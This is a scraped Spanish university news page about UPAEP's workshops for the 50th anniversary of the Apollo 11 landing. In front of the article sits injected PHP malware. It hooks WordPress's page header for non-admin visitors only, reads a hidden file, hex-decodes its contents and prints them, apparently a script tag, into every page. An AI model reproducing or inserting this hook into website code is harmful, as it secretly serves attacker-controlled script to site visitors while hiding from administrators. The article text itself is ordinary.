if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } UPAEP participa en el festejo del 50 aniversario del Primer Alunizaje – La Opinión Universitaria La Opinión Universitaria
Menu

UPAEP participa en el festejo del 50 aniversario del Primer Alunizaje

 

 

* Decanato de Ingenierías impartió 3 talleres relacionados con la llegada de la misión Apolo a la Luna el 20 de Julio de 1969

 

El 20 de Julio se conmemoró el primer alunizaje del hombre, realizado por la misión Apolo 11, en el cuál viajaba la tripulación conformada por Neil A. Armstrong, Edwin E. Aldrin Jr., y Michael Collins. El día para el despegue fue el 16 de julio de 1969, la llegada a la Luna el 21 y el retorno a la Tierra el 24. En total serían 8 días. En este viaje, Armstrong y Aldrin fueron los astronautas que bajaron a la superficie lunar, y de ahí la famosa frase “Un pequeño paso para el hombre, un gran paso para la humanidad…”

 

Para este 50 aniversario, se realizaron una serie de talleres en el Museo Nacional de los Ferrocarriles Mexicanos en Puebla, Pue. En donde participaron diferentes organizaciones tanto públicas como privadas, entre ellas el área de Física del Decanato de Ingenierías de UPAEP.

 

La institución participó con la impartición de 3 talleres relacionados con el alunizaje: una pantalla para focos, imágenes distorsionados para ver con espejos esféricos y uno de las fases de la luna. Además, de que los profesores y estudiantes hicieron posible ésta intervención desarrollaron una animación hecha con efecto Moiré.

 

Como parte del programa, la Dra. Anahí Caldú Primo, directora de Comunicación de la Ciencia CONACYT, ofreció una conferencia en la que contó los antecedentes de la carrera espacial entre Estados Unidos y Rusia.

  • No comments

    Deja una respuesta

    Tweets recientes